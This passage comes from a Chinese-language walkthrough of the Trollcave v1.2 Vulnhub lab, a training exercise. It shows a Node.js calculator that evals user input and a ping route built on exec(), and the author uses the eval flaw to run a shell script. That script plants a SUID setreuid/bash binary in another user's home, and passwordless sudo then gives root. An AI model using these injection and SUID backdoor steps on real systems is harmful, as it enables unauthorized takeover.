"/ping":</span><br><span class="line"> pingit(pathname, request, query, response);</span><br><span class="line"> break; */</span><br><span class="line"></span><br><span class="line"> case "/":</span><br><span class="line"> home(pathname, request, query, response);</span><br><span class="line"> break;</span><br><span class="line"></span><br><span class="line"> case "/calc":</span><br><span class="line"> calc(pathname, request, query, response);</span><br><span class="line"> break;</span><br><span class="line"></span><br><span class="line"> default:</span><br><span class="line"> console.log("404");</span><br><span class="line"> display_404(pathname, request, response);</span><br><span class="line"> break;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function home(pathname, request, query, response)</span><br><span class="line">{</span><br><span class="line"> response.end("<h1>The King's Calculator</h1>" +</span><br><span class="line"> "<p>Enter your calculation below:</p>" +</span><br><span class="line"> "<form action='/calc' method='get'>" +</span><br><span class="line"> "<input type='text' name='sum' value='1+1'>" +</span><br><span class="line"> "<input type='submit' value='Calculate!'>" +</span><br><span class="line"> "</form>" +</span><br><span class="line"> "<hr style='margin-top:50%'>" +</span><br><span class="line"> "<small><i>Powered by node.js</i></small>"</span><br><span class="line"> );</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function calc(pathname, request, query, response)</span><br><span class="line">{</span><br><span class="line"> sum = query.split('=')[1];</span><br><span class="line"> console.log(sum)</span><br><span class="line"> response.writeHead(200, {"Content-Type": "text/plain"});</span><br><span class="line"></span><br><span class="line"> response.end(eval(sum).toString());//此处执行了eval</span><br><span 
class="line">}</span><br><span class="line"></span><br><span class="line">function ping(pathname, request, query, response)</span><br><span class="line">{</span><br><span class="line"> ip = query.split('=')[1];</span><br><span class="line"> console.log(ip)</span><br><span class="line"> response.writeHead(200, {"Content-Type": "text/plain"});</span><br><span class="line"></span><br><span class="line"> exec("ping -c4 " + ip, function(err, stdout, stderr) {</span><br><span class="line"> response.end(stdout);</span><br><span class="line"> });</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function display_404(pathname, request, response)</span><br><span class="line">{</span><br><span class="line"> response.write("<h1>404 Not Found</h1>");</span><br><span class="line"> response.end("I don't have that page, sorry!");</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// Start the server and route the requests</span><br><span class="line">start(route);</span><br><span class="line">rails@trollcave:~$ </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>经过审计得到var exec = require(‘child_process’).exec;//此处有命令执行漏洞</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231621733.png" alt="image-20230628231621733"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/tmp$ ls 
-al</span><br><span class="line">total 56</span><br><span class="line">drwxrwxrwt 9 root root 4096 Sep 2 17:46 .</span><br><span class="line">drwxr-xr-x 23 root root 4096 Sep 2 2021 ..</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .font-unix</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .ICE-unix</span><br><span class="line">-rw-r--r-- 1 king king 0 Sep 2 17:46 passwd</span><br><span class="line">-rw------- 1 rails rails 16664 Sep 2 15:40 RackMultipart20210902-1065-1d715xb</span><br><span class="line">drwx------ 3 root root 4096 Sep 2 2021 systemd-private-3102f8c2d65243ab854375d95f3f6255-systemd-timesyncd.service-yaMXNV</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .Test-unix</span><br><span class="line">drwx------ 2 root root 4096 Sep 2 2021 vmware-root</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .X11-unix</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .XIM-unix</span><br><span class="line">rails@trollcave:/tmp$ cat passwd</span><br><span class="line">rails@trollcave:/tmp$ </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>发现是king用户创建的,但是里面没有内容</p><p>在/tmp目录下</p><p>创建一个1.sh,内容为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">touch /tmp/123.txt</span><br></pre></td></tr></table></figure><p>chmod 755 1.sh</p><p>测试是否能够运行</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231643157.png" alt="image-20230628231643157"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/tmp$ ls</span><br><span class="line">123.txt 1.sh pass passwd RackMultipart20210902-1065-1d715xb 
systemd-private-3102f8c2d65243ab854375d95f3f6255-systemd-timesyncd.service-yaMXNV vmware-root</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>成功运行了touch命令</p><p>那么可以通过suid进行提权</p><p>查看King的uid和gid</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/tmp$ cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span 
class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false</span><br><span class="line">systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false</span><br><span class="line">systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false</span><br><span class="line">systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false</span><br><span class="line">syslog:x:104:108::/home/syslog:/bin/false</span><br><span class="line">_apt:x:105:65534::/nonexistent:/bin/false</span><br><span class="line">lxd:x:106:65534::/var/lib/lxd/:/bin/false</span><br><span class="line">messagebus:x:107:111::/var/run/dbus:/bin/false</span><br><span class="line">uuidd:x:108:112::/run/uuidd:/bin/false</span><br><span class="line">dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false</span><br><span class="line">sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin</span><br><span class="line">postgres:x:111:116:PostgreSQL 
administrator,,,:/var/lib/postgresql:/bin/bash</span><br><span class="line">king:x:1000:1000:King,,,:/home/king:/bin/bash</span><br><span class="line">rails:x:1001:1001::/home/rails:</span><br><span class="line">dragon:x:1002:1002:,,,:/home/dragon:/bin/bash</span><br><span class="line">dave:x:1003:1003:,,,:/home/dave:/bin/bash</span><br><span class="line">coderguy:x:1004:1004:,,,:/home/coderguy:/bin/bash</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>King的uid是1000gid是1000</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#include <stdio.h></span><br><span class="line">#include <stdlib.h></span><br><span class="line">#include <unistd.h></span><br><span class="line">int main(int argc,char *argv[])</span><br><span class="line">{</span><br><span class="line">setreuid(1000,1000);</span><br><span class="line">execve("/bin/bash",NULL,NULL);</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>gcc king.c -o king</p><p>然后将king上传至靶机/tmp</p><p>在1.sh中写入</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">cp /tmp/king /home/king/exp</span><br><span class="line">chmod 4755 /home/king/exp</span><br></pre></td></tr></table></figure><p>使用burp运行1.sh</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231705251.png" alt="image-20230628231705251"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/tmp$ ls /home/king/</span><br><span class="line">calc exp</span><br></pre></td></tr></table></figure><p>使用exp提权,成功提权到King</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/home/king$ ./exp</span><br><span class="line">king@trollcave:/home/king$ </span><br></pre></td></tr></table></figure><p>查询sudo权限,发现不需要密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">king@trollcave:/home/king$ sudo -l</span><br><span class="line">Matching Defaults entries for king on trollcave:</span><br><span class="line"> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User king may run the following commands on trollcave:</span><br><span class="line"> (ALL) NOPASSWD: ALL</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>那么直接提权到root,获取flag</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">king@trollcave:/home/king$ sudo su -</span><br><span class="line">root@trollcave:~# cat /root/flag.txt </span><br><span class="line">et tu, dragon?</span><br><span class="line"></span><br><span 
class="line">c0db34ce8adaa7c07d064cc1697e3d7cb8aec9d5a0c4809d5a0c4809b6be23044d15379c5</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><p>cve-2017-16995在虚拟机安装有故障的时候会提权失败。suid提权是需要对应权限的用户的命令。chmod 4755与chmod 755 的区别在于开头多了一位,这个4表示其他用户执行文件时,具有与所有者相当的权限。</p>]]></content>
<categories>
<category> Vulnhub </category>
</categories>
<tags>
<tag> 渗透测试 </tag>
<tag> 提权 </tag>
<tag> Linux </tag>
</tags>
</entry>
</search>